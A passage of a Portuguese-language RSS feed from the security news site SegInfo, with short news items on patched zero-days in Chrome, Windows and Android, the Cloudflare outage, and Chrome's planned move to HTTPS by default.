<p class="wp-block-paragraph">Os mesmos endereços IP também foram associados a varreduras relacionadas à vulnerabilidade em produtos <strong>Liferay (CVE-2025-4581)</strong>, além de tentativas de exploração do <strong>Log4j</strong>, indicando um histórico de busca ativa por falhas críticas na internet.</p>



<h2 class="wp-block-heading" id="h-oracle-e-searchlight-ainda-nao-comentaram">Oracle e Searchlight ainda não comentaram</h2>



<p class="wp-block-paragraph">O portal SecurityWeek informou ter contatado a Oracle para comentários adicionais, mas ainda não obteve resposta. A Searchlight também foi questionada sobre a possibilidade de a atividade identificada pelo SANS estar relacionada aos próprios testes de pesquisa conduzidos pela empresa.</p>
<p>The post <a href="https://seginfo.com.br/2025/11/21/vulnerabilidade-critica-no-oracle-identity-manager-pode-ter-sido-explorada-como-zero-day/">Vulnerabilidade crítica no Oracle Identity Manager pode ter sido explorada como zero-day</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73619</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Chrome corrige falha zero-day já explorada em ataques na versão 142</title>
		<link>https://seginfo.com.br/2025/11/19/chrome-corrige-falha-zero-day-ja-explorada-em-ataques-na-versao-142/</link>
		
		
		<pubDate>Wed, 19 Nov 2025 15:05:19 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73604</guid>

					<description><![CDATA[<p>O Google lançou na segunda-feira (17/11/25) uma atualização emergencial do Chrome 142 para corrigir uma vulnerabilidade que estava sendo explorada ativamente como zero-day. A falha, catalogada como CVE-2025-13223 e com pontuação CVSS 8.8, foi classificada como de alta severidade e decorre de um problema de type confusion no motor V8, responsável por executar JavaScript e&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/11/19/chrome-corrige-falha-zero-day-ja-explorada-em-ataques-na-versao-142/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/11/19/chrome-corrige-falha-zero-day-ja-explorada-em-ataques-na-versao-142/">Chrome corrige falha zero-day já explorada em ataques na versão 142</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="576" src="https://seginfo.com.br/wp-content/uploads/2023/12/post-seginfo-06.12.23-1024x576.png" alt="" class="wp-image-64703" style="width:732px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2023/12/post-seginfo-06.12.23-1024x576.png 1024w, https://seginfo.com.br/wp-content/uploads/2023/12/post-seginfo-06.12.23-300x169.png 300w, https://seginfo.com.br/wp-content/uploads/2023/12/post-seginfo-06.12.23-150x84.png 150w, https://seginfo.com.br/wp-content/uploads/2023/12/post-seginfo-06.12.23-768x432.png 768w, https://seginfo.com.br/wp-content/uploads/2023/12/post-seginfo-06.12.23-1536x864.png 1536w, https://seginfo.com.br/wp-content/uploads/2023/12/post-seginfo-06.12.23-1200x675.png 1200w, https://seginfo.com.br/wp-content/uploads/2023/12/post-seginfo-06.12.23-1170x658.png 1170w, https://seginfo.com.br/wp-content/uploads/2023/12/post-seginfo-06.12.23-1820x1024.png 1820w, https://seginfo.com.br/wp-content/uploads/2023/12/post-seginfo-06.12.23-853x480.png 853w, https://seginfo.com.br/wp-content/uploads/2023/12/post-seginfo-06.12.23.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">O Google lançou na segunda-feira (17/11/25) uma atualização emergencial do Chrome 142 para corrigir uma vulnerabilidade que estava sendo explorada ativamente como <em>zero-day</em>.</p>



<p class="wp-block-paragraph">A falha, catalogada como <strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-13223" target="_blank" rel="noreferrer noopener nofollow">CVE-2025-13223</a></strong> e com pontuação <strong>CVSS 8.8</strong>, foi classificada como de alta severidade e decorre de um problema de <strong>type confusion</strong> no motor <strong>V8</strong>, responsável por executar JavaScript e WebAssembly no navegador.</p>



<h2 class="wp-block-heading" id="h-riscos-da-vulnerabilidade">Riscos da vulnerabilidade</h2>



<p class="wp-block-paragraph">Erros de <em>memory safety</em> como esse podem causar comportamentos inesperados no software e abrir caminhos para <strong>execução remota de código</strong>, travamentos e outras ações maliciosas.<br>No caso do V8, vulnerabilidades dessa natureza costumam ser exploradas através de páginas HTML especialmente manipuladas, permitindo operações de leitura e escrita remotas na memória.</p>



<p class="wp-block-paragraph">Em nota oficial, a empresa confirmou que <strong>já existe um exploit ativo para a falha</strong>, mas não divulgou detalhes técnicos do bug ou de como ele vem sendo utilizado em ataques.</p>



<h2 class="wp-block-heading" id="h-ligacao-com-spyware-comercial">Ligação com spyware comercial</h2>



<p class="wp-block-paragraph">A vulnerabilidade foi reportada no dia 12 de novembro por <strong>Clément Lecigne</strong>, pesquisador do <strong>Google Threat Analysis Group (TAG)</strong> — equipe que frequentemente identifica falhas exploradas por fornecedores de <em>spyware</em> comercial.<br>Pesquisadores do TAG já descobriram diversas vulnerabilidades usadas em campanhas desse tipo, inclusive no próprio Chrome, o que sugere que a CVE-2025-13223 pode ter sido alvo de grupos especializados nesse mercado.</p>



<p class="wp-block-paragraph">Com essa correção, o Chrome chega ao <strong>sétimo zero-day resolvido apenas em 2025</strong>. O anterior havia sido corrigido em setembro.</p>



<h2 class="wp-block-heading" id="h-outras-correcoes-incluidas-na-atualizacao">Outras correções incluídas na atualização</h2>



<p class="wp-block-paragraph">O update também resolve a <strong>CVE-2025-13224</strong>, outro problema de <em>type confusion</em> no motor V8, reportado pelo agente de IA <strong>Big Sleep</strong>.<br>A Google não indicou que essa falha tenha sido explorada, mas já elogiou anteriormente o trabalho do Big Sleep na identificação de vulnerabilidades que poderiam ser usadas por cibercriminosos.</p>



<h2 class="wp-block-heading" id="h-atualizacao-disponivel">Atualização disponível</h2>



<p class="wp-block-paragraph">A nova versão do navegador já está sendo distribuída para todos os usuários:</p>



<ul class="wp-block-list">
<li>• <strong>Linux:</strong> 142.0.7444.175</li>



<li>• <strong>macOS:</strong> 142.0.7444.176</li>



<li>• <strong>Windows:</strong> 142.0.7444.175/.176</li>
</ul>



<p class="wp-block-paragraph">A recomendação é atualizar o Chrome o quanto antes para garantir proteção contra possíveis explorações dessas falhas.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/chrome-142-update-patches-exploited-zero-day/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/11/19/chrome-corrige-falha-zero-day-ja-explorada-em-ataques-na-versao-142/">Chrome corrige falha zero-day já explorada em ataques na versão 142</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73604</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Cloudflare confirma que instabilidade global não foi causada por ataque cibernético</title>
		<link>https://seginfo.com.br/2025/11/19/cloudflare-confirma-que-instabilidade-global-nao-foi-causada-por-ataque-cibernetico/</link>
		
		
		<pubDate>Wed, 19 Nov 2025 13:46:50 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73583</guid>

					<description><![CDATA[<p>Diversos serviços online enfrentaram instabilidades nesta terça-feira (18/11), afetando plataformas como ChatGPT, X, Dropbox, Shopify e o jogo League of Legends. A falha também impactou operações digitais de organizações críticas, incluindo o New Jersey Transit, o Departamento de Gerenciamento de Emergências de Nova York e a empresa ferroviária francesa SNCF. Inicialmente, a Cloudflare informou ter&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/11/19/cloudflare-confirma-que-instabilidade-global-nao-foi-causada-por-ataque-cibernetico/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/11/19/cloudflare-confirma-que-instabilidade-global-nao-foi-causada-por-ataque-cibernetico/">Cloudflare confirma que instabilidade global não foi causada por ataque cibernético</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="683" src="https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1534063932-1024x683.jpeg" alt="" class="wp-image-73585" style="aspect-ratio:1.4992888417882142;width:754px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1534063932-1024x683.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1534063932-300x200.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1534063932-150x100.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1534063932-768x512.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1534063932-1536x1024.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1534063932-2048x1365.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1534063932-1170x780.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1534063932-720x480.jpeg 720w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">Diversos serviços online enfrentaram instabilidades nesta terça-feira (18/11), afetando plataformas como ChatGPT, X, Dropbox, Shopify e o jogo League of Legends. A falha também impactou operações digitais de organizações críticas, incluindo o New Jersey Transit, o Departamento de Gerenciamento de Emergências de Nova York e a empresa ferroviária francesa SNCF.</p>



<p class="wp-block-paragraph">Inicialmente, a Cloudflare informou ter identificado um “pico de tráfego incomum”, o que levou à especulação de que o problema poderia estar relacionado a um possível ataque cibernético. No entanto, o CTO da companhia, <strong>Dane Knecht</strong>, esclareceu posteriormente que <strong>não se tratou de um ataque</strong>.</p>



<p class="wp-block-paragraph">Segundo <strong>Knecht</strong>, o incidente foi provocado por “um bug latente em um serviço essencial para nossa capacidade de mitigação de bots, que começou a falhar após uma mudança rotineira de configuração”. Esse problema desencadeou uma degradação em larga escala na rede e em outros serviços da empresa.</p>



<p class="wp-block-paragraph">O executivo classificou o impacto como inaceitável e afirmou que equipes já estão trabalhando para evitar que a falha se repita. “Sei que isso causou transtornos reais hoje”, declarou.</p>



<p class="wp-block-paragraph">De acordo com a página de status da Cloudflare, a investigação sobre o incidente começou às 11h48 (UTC), e a correção foi aplicada às 14h42 (UTC). Ainda assim, alguns erros continuaram sendo registrados por mais algumas horas.</p>



<p class="wp-block-paragraph"><strong>Knecht</strong> informou que a Cloudflare divulgará em breve uma explicação detalhada sobre as causas da falha.</p>



<p class="wp-block-paragraph">A empresa é responsável por mitigar ataques distribuídos de negação de serviço (DDoS) de grande escala — incluindo alguns recordistas — direcionados a seus clientes. Apesar disso, especialistas apontam que seria necessário um volume significativo de recursos e expertise para que um ator mal-intencionado conseguisse comprometer a própria infraestrutura da Cloudflare. Além disso, não é incomum que grupos de hackers, especialmente hacktivistas, reivindiquem falsamente a autoria de interrupções desse tipo.</p>



<p class="wp-block-paragraph"><strong>Matthew Prince</strong>, cofundador e CEO da Cloudflare, também publicou um post com informações adicionais, classificando o episódio como o pior apagão enfrentado pela empresa desde 2019.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/cloudflare-says-highly-disruptive-outage-not-caused-by-attack/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/11/19/cloudflare-confirma-que-instabilidade-global-nao-foi-causada-por-ataque-cibernetico/">Cloudflare confirma que instabilidade global não foi causada por ataque cibernético</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73583</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Microsoft corrige falha zero-day explorada no Windows em atualização do Patch Tuesday</title>
		<link>https://seginfo.com.br/2025/11/13/microsoft-corrige-falha-zero-day-explorada-no-windows-em-atualizacao-do-patch-tuesday/</link>
		
		
		<pubDate>Thu, 13 Nov 2025 18:00:00 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73545</guid>

					<description><![CDATA[<p>A Microsoft lançou, nesta terça-feira (12), o seu pacote mensal de atualizações de segurança — conhecido como Patch Tuesday — referente a novembro. No total, foram corrigidas 63 vulnerabilidades, incluindo uma falha zero-day que vinha sendo ativamente explorada por cibercriminosos. Vulnerabilidade zero-day no kernel do Windows A falha, identificada como CVE-2025-62215, é uma vulnerabilidade de&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/11/13/microsoft-corrige-falha-zero-day-explorada-no-windows-em-atualizacao-do-patch-tuesday/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/11/13/microsoft-corrige-falha-zero-day-explorada-no-windows-em-atualizacao-do-patch-tuesday/">Microsoft corrige falha zero-day explorada no Windows em atualização do Patch Tuesday</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="683" src="https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_446756617_Editorial_Use_Only-1024x683.jpeg" alt="" class="wp-image-73547" style="aspect-ratio:1.4992888417882142;width:792px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_446756617_Editorial_Use_Only-1024x683.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_446756617_Editorial_Use_Only-300x200.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_446756617_Editorial_Use_Only-150x100.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_446756617_Editorial_Use_Only-768x512.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_446756617_Editorial_Use_Only-1536x1024.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_446756617_Editorial_Use_Only-2048x1366.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_446756617_Editorial_Use_Only-1170x780.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_446756617_Editorial_Use_Only-720x480.jpeg 720w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A Microsoft lançou, nesta terça-feira (12), o seu pacote mensal de atualizações de segurança — conhecido como <em>Patch Tuesday</em> — referente a novembro. No total, foram corrigidas <strong>63 vulnerabilidades</strong>, incluindo uma falha zero-day que vinha sendo ativamente explorada por cibercriminosos.</p>



<h3 class="wp-block-heading" id="h-vulnerabilidade-zero-day-no-kernel-do-windows">Vulnerabilidade zero-day no kernel do Windows</h3>



<p class="wp-block-paragraph">A falha, identificada como <strong>CVE-2025-62215</strong>, é uma vulnerabilidade de <strong>elevação de privilégios</strong> no kernel do Windows. Segundo a Microsoft, o problema permitia que um atacante autenticado explorasse uma <strong>condição de corrida (race condition)</strong> para obter privilégios de <strong>SISTEMA</strong>, ganhando controle total sobre o dispositivo.</p>



<p class="wp-block-paragraph">Em nota técnica, a empresa explicou o mecanismo da exploração: “A execução simultânea utilizando recursos partilhados com sincronização inadequada no kernel do Windows permite que um atacante autorizado eleve os seus privilégios localmente”.</p>



<h3 class="wp-block-heading" id="h-outras-falhas-corrigidas">Outras falhas corrigidas</h3>



<p class="wp-block-paragraph">Além da vulnerabilidade zero-day, o pacote de novembro também inclui correções para <strong>quatro falhas classificadas como críticas</strong>, sendo:</p>



<ul class="wp-block-list">
<li><strong>•</strong> Duas vulnerabilidades de <strong>execução remota de código (RCE)</strong>;</li>



<li><strong>•</strong> Uma vulnerabilidade de <strong>elevação de privilégios</strong>;</li>



<li><strong>•</strong> Uma falha de <strong>divulgação de informação</strong>.</li>
</ul>



<p class="wp-block-paragraph">Essas correções fazem parte do esforço contínuo da Microsoft para reforçar a segurança de seus sistemas e mitigar potenciais vetores de ataque explorados em ambientes corporativos e domésticos.</p>



<h3 class="wp-block-heading" id="h-inicio-do-programa-esu-para-o-windows-10">Início do programa ESU para o Windows 10</h3>



<p class="wp-block-paragraph">A atualização de novembro marca ainda a estreia do <strong>Extended Security Update (ESU)</strong> para o Windows 10. O suporte de segurança gratuito do sistema operacional foi encerrado em <strong>14 de outubro de 2025</strong>, e o novo programa oferece atualizações pagas para empresas e usuários que ainda não migraram para o <strong>Windows 11</strong>.</p>



<p class="wp-block-paragraph">A Microsoft reforça a recomendação para que os usuários <strong>atualizem para o Windows 11</strong> ou <strong>adiram ao programa ESU</strong>, garantindo assim o recebimento de patches de segurança essenciais e proteção contra novas ameaças.</p>



<p class="wp-block-paragraph"></p>
<p>The post <a href="https://seginfo.com.br/2025/11/13/microsoft-corrige-falha-zero-day-explorada-no-windows-em-atualizacao-do-patch-tuesday/">Microsoft corrige falha zero-day explorada no Windows em atualização do Patch Tuesday</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73545</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Google corrige falha crítica no Android que expõe milhões de usuários</title>
		<link>https://seginfo.com.br/2025/11/06/google-corrige-falha-critica-no-android-que-expoe-milhoes-de-usuarios/</link>
		
		
		<pubDate>Thu, 06 Nov 2025 18:11:01 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73495</guid>

					<description><![CDATA[<p>O Google lançou, no seu Boletim de Segurança de novembro de 2025, uma atualização que corrige duas vulnerabilidades graves na componente Sistema do Android, uma delas classificada como crítica e potencialmente explorável para execução remota de código. A principal falha, identificada como CVE-2025-48593, afeta diversas versões do Android Open Source Project (AOSP), da 13 à&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/11/06/google-corrige-falha-critica-no-android-que-expoe-milhoes-de-usuarios/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/11/06/google-corrige-falha-critica-no-android-que-expoe-milhoes-de-usuarios/">Google corrige falha crítica no Android que expõe milhões de usuários</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="683" src="https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1571328138_Editorial_Use_Only-1024x683.jpeg" alt="" class="wp-image-73497" style="aspect-ratio:1.4992888417882142;width:708px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1571328138_Editorial_Use_Only-1024x683.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1571328138_Editorial_Use_Only-300x200.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1571328138_Editorial_Use_Only-150x100.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1571328138_Editorial_Use_Only-768x512.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1571328138_Editorial_Use_Only-1536x1024.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1571328138_Editorial_Use_Only-2048x1366.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1571328138_Editorial_Use_Only-1170x780.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1571328138_Editorial_Use_Only-1535x1024.jpeg 1535w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1571328138_Editorial_Use_Only-720x480.jpeg 720w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">O Google lançou, no seu Boletim de Segurança de novembro de 2025, uma atualização que corrige duas vulnerabilidades graves na componente <strong>Sistema</strong> do Android, uma delas classificada como <strong>crítica</strong> e potencialmente explorável para execução remota de código.</p>



<p class="wp-block-paragraph">A principal falha, identificada como <strong>CVE-2025-48593</strong>, afeta diversas versões do Android Open Source Project (AOSP), da 13 à 16, e permite que um atacante execute código malicioso sem necessidade de privilégios adicionais ou interação do utilizador. Devido à natureza dessa vulnerabilidade, o risco é elevado, podendo resultar em <strong>roubo de dados</strong>, <strong>instalação de ransomware</strong> ou até na transformação do dispositivo comprometido em um <strong>nó de botnet</strong>.</p>



<p class="wp-block-paragraph">Embora a Google não tenha relatado exploração ativa desta falha em ataques reais, a empresa destaca que o potencial de impacto é severo, dada a quantidade de informações sensíveis processadas pelos dispositivos Android em todo o mundo.</p>



<p class="wp-block-paragraph">Outra vulnerabilidade corrigida neste ciclo de atualizações é a <strong>CVE-2025-48581</strong>, que afeta a versão 16 do sistema operativo. De acordo com o <strong>NIST (National Institute of Standards and Technology)</strong>, a falha ocorre na função <em>VerifyNoOverlapInSessions</em> do ficheiro <em>apex.cpp</em>, e pode ser explorada para <strong>bloquear atualizações de segurança</strong> ou permitir <strong>escalação de privilégios locais</strong> sem necessidade de permissões adicionais.</p>



<p class="wp-block-paragraph">Com estas correções, a Google também anunciou uma <strong>mudança no formato das atualizações mensais</strong>, que passam a ser distribuídas com <strong>apenas um nível de correções de segurança</strong>, simplificando o processo de atualização para fabricantes e utilizadores finais.</p>



<p class="wp-block-paragraph">As correções já estão disponíveis para os dispositivos compatíveis, e a recomendação é que todos os utilizadores do Android mantenham o sistema atualizado para garantir a máxima proteção contra possíveis explorações dessas vulnerabilidades.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.itsecurity.pt/news/threats/google-corrige-vulnerabilidade-critica-no-android-que-ameaca-milhoes-de-utilizadores" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/11/06/google-corrige-falha-critica-no-android-que-expoe-milhoes-de-usuarios/">Google corrige falha crítica no Android que expõe milhões de usuários</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73495</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Chrome passará a usar HTTPS por padrão em sites públicos a partir de 2026</title>
		<link>https://seginfo.com.br/2025/10/31/chrome-passara-a-usar-https-por-padrao-em-sites-publicos-a-partir-de-2026/</link>
		
		
		<pubDate>Fri, 31 Oct 2025 20:46:39 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73421</guid>

					<description><![CDATA[<p>O Google anunciou que, a partir de outubro de 2026, o navegador Chrome passará a usar conexões seguras (HTTPS) por padrão em todos os sites públicos. A mudança tem como objetivo reforçar a segurança dos usuários e reduzir o risco de ataques durante a navegação. A configuração “Sempre usar conexões seguras” (Always Use Secure Connections)&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/10/31/chrome-passara-a-usar-https-por-padrao-em-sites-publicos-a-partir-de-2026/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/10/31/chrome-passara-a-usar-https-por-padrao-em-sites-publicos-a-partir-de-2026/">Chrome passará a usar HTTPS por padrão em sites públicos a partir de 2026</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="574" src="https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1536108331-1024x574.jpeg" alt="" class="wp-image-73424" style="width:772px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1536108331-1024x574.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1536108331-300x168.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1536108331-150x84.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1536108331-768x430.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1536108331-1536x861.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1536108331-2048x1148.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1536108331-1170x656.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1536108331-1827x1024.jpeg 1827w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1536108331-856x480.jpeg 856w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">O Google anunciou que, a partir de outubro de 2026, o navegador Chrome passará a usar conexões seguras (HTTPS) por padrão em todos os sites públicos. A mudança tem como objetivo reforçar a segurança dos usuários e reduzir o risco de ataques durante a navegação.</p>



<p class="wp-block-paragraph">A configuração <strong>“Sempre usar conexões seguras”</strong> (Always Use Secure Connections) foi introduzida em 2022 como uma opção manual. Desde então, a empresa vem testando sua ativação automática para uma parcela de usuários. Com o lançamento previsto do <strong>Chrome 154</strong>, o recurso será habilitado por padrão para todos os usuários.</p>



<h3 class="wp-block-heading" id="h-o-que-muda-na-pratica">O que muda na prática</h3>



<p class="wp-block-paragraph">Com a nova configuração, o Chrome tentará acessar automaticamente todas as páginas via HTTPS. Caso o site não ofereça uma conexão segura, o navegador exibirá um <strong>aviso de segurança</strong> e pedirá autorização explícita do usuário para continuar a navegação.</p>



<p class="wp-block-paragraph">Segundo o Google, o uso de HTTPS garante uma navegação mais segura, pois impede que invasores interceptem ou modifiquem o conteúdo acessado.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“Quando links não utilizam HTTPS, um atacante pode sequestrar a navegação e forçar o carregamento de recursos maliciosos, expondo o usuário a malware, exploração direcionada ou ataques de engenharia social”, explica a empresa.</p>
</blockquote>



<h3 class="wp-block-heading" id="h-adocao-crescente-do-https">Adoção crescente do HTTPS</h3>



<p class="wp-block-paragraph">De acordo com o Google, mais de <strong>95% dos sites na web já utilizam conexões criptografadas</strong>. Nos testes realizados, o aviso de “conexão insegura” foi exibido em menos de 3% das navegações. A expectativa é que esse número seja ainda menor após a migração completa para HTTPS.</p>



<p class="wp-block-paragraph">Grande parte dos acessos via HTTP, segundo a empresa, ocorre em sites que redirecionam automaticamente para versões seguras (HTTPS). O Google também informou que já entrou em contato com as organizações responsáveis por conexões inseguras e espera que todas façam a transição definitiva ao longo do próximo ano.</p>



<h3 class="wp-block-heading" id="h-migracao-facilitada-e-seguranca-ampliada">Migração facilitada e segurança ampliada</h3>



<p class="wp-block-paragraph">Uma nova permissão de <strong>acesso à rede local</strong> também deve facilitar a migração de sites que ainda servem conteúdo misto — parte seguro e parte inseguro — para o HTTPS, permitindo que eles contornem certas verificações de conteúdo misto.</p>



<p class="wp-block-paragraph">Antes da ativação definitiva em 2026, o Google planeja disponibilizar o recurso por padrão em <strong>abril de 2026</strong>, com o lançamento do <strong>Chrome 147</strong>, para usuários que utilizam a proteção de <strong>Navegação Segura Avançada</strong> (Enhanced Safe Browsing).</p>



<p class="wp-block-paragraph">Usuários que preferirem desativar os avisos em sites HTTP poderão fazê-lo manualmente, desabilitando a opção “Sempre usar conexões seguras”.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/chrome-to-turn-https-on-by-default-for-public-sites/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/10/31/chrome-passara-a-usar-https-por-padrao-em-sites-publicos-a-partir-de-2026/">Chrome passará a usar HTTPS por padrão em sites públicos a partir de 2026</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73421</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Zero-Day do Chrome é explorado em campanha de espionagem digital</title>
		<link>https://seginfo.com.br/2025/10/27/zero-day-do-chrome-e-explorado-em-campanha-de-espionagem-digital/</link>
		
		
		<pubDate>Mon, 27 Oct 2025 20:12:37 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73399</guid>

